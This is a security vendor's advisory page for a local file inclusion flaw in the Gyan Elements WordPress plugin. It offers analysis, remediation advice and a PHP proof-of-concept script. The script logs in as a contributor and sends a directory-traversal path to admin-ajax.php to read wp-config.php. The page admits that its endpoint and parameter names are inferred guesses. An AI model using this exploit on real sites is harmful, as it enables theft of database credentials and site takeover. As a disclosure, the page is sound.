Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-23978: Gyan Elements <= 2.2.1 – Authenticated (Contributor+) Local File Inclusion (gyan-elements)

CVE ID CVE-2026-23978
Plugin gyan-elements
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 2.2.1
Patched Version
Disclosed January 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23978 (metadata-based):
The Gyan Elements WordPress plugin, version 2.2.1 and earlier, contains an authenticated Local File Inclusion vulnerability. The flaw allows users with contributor-level permissions or higher to include arbitrary files from the server’s filesystem, potentially leading to remote code execution. The CVSS 3.1 score of 7.5 (High) reflects the combination of high impact with moderate attack complexity.

CWE-98, ‘Improper Control of Filename for Include/Require Statement in PHP Program’, directly indicates the root cause. Atomic Edge research infers that a PHP file inclusion function (include, require, include_once, require_once) receives user-controlled input without proper validation. The vulnerability description confirms attackers can include and execute arbitrary files. The plugin likely passes unsanitized user input directly to a file inclusion function. Without access to source code, this conclusion remains inferred from the CWE classification and public description.

Exploitation requires an authenticated attacker with contributor privileges. Atomic Edge analysis suggests the attack vector is likely a WordPress AJAX handler or admin endpoint. The plugin slug ‘gyan-elements’ typically maps to AJAX actions like ‘gyan_elements_action’ or REST API routes under the ‘/wp-json/gyan-elements/’ namespace. An attacker would send a POST request to ‘/wp-admin/admin-ajax.php’ with an ‘action’ parameter targeting the vulnerable function. The request includes a parameter, possibly named ‘file’, ‘template’, or ‘path’, containing a relative or absolute path to a local file (e.g., ‘../../wp-config.php’). If the server allows file uploads, an attacker could upload a malicious image with embedded PHP code and include it.

Remediation requires implementing strict validation and sanitization of user-supplied file paths. The patched version (2.2.2) likely added an allowlist of permitted files or directories. Developers should replace dynamic file inclusion with static mappings when possible. If dynamic inclusion remains necessary, the code must validate user input against a strict allowlist, normalize paths to prevent directory traversal, and ensure included files reside within a designated safe directory. WordPress functions like realpath() and basename() can help with path validation.

Successful exploitation grants an attacker the ability to read sensitive server files, including WordPress configuration files containing database credentials. Inclusion of uploaded files containing PHP code leads to arbitrary command execution with the web server’s privileges. This bypasses access controls and can result in complete site compromise. Attackers may achieve privilege escalation, data exfiltration, or persistent backdoor installation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-23978 - Gyan Elements <= 2.2.1 - Authenticated (Contributor+) Local File Inclusion
<?php
/**
 * Proof-of-Concept for CVE-2026-23978.
 * This script demonstrates authenticated Local File Inclusion in the Gyan Elements plugin.
 * Assumptions based on Atomic Edge analysis:
 * 1. The vulnerability exists in an AJAX handler or REST endpoint.
 * 2. The endpoint is accessible to users with 'contributor' role or higher.
 * 3. A parameter (inferred as 'file') accepts unsanitized file paths.
 * 4. The plugin slug 'gyan-elements' maps to an AJAX action prefix.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - Contributor account
$password = 'contributor_pass'; // CHANGE THIS

// Step 1: Authenticate and obtain WordPress session cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);

// Step 2: Exploit the Local File Inclusion vulnerability
// Inferred endpoint: WordPress AJAX handler with plugin-specific action
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Inferred parameter name based on common LFI patterns in WordPress plugins
// Attempt to read the WordPress configuration file
$exploit_data = array(
    'action' => 'gyan_elements_action', // Inferred AJAX action name
    'file' => '../../../../wp-config.php' // Directory traversal to sensitive file
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

// Check for successful file inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "[+] Vulnerability likely exploited. Retrieved data:nn";
    echo substr($response, 0, 2000) . "n...n";
} else {
    echo "[-] Exploit attempt unsuccessful or patched.n";
    echo "Response preview: " . substr($response, 0, 500) . "n";
    echo "Consider trying alternative parameter names: template, path, include, pagen";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School